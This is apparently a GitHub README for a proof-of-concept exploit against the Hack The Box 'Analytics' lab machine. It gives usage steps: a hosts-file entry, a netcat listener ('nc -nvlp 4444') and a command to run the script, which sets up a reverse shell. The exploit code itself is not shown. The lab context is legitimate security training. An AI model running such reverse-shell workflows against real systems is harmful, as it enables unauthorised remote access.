Skip to content

Files

Latest commit

62c8def · Oct 11, 2023

History

History
7 lines (5 loc) · 231 Bytes

README.md

File metadata and controls

7 lines (5 loc) · 231 Bytes

HTB_Analytics

Usage: python3 HTB_Analytics_poc.py <listener ip> <listener port>

1. echo "10.10.11.233 data.analytical.htb" >> /etc/hosts

2. nc -nvlp 4444

3. python3 HTB_Analytics_poc.py 10.10.14.1 4444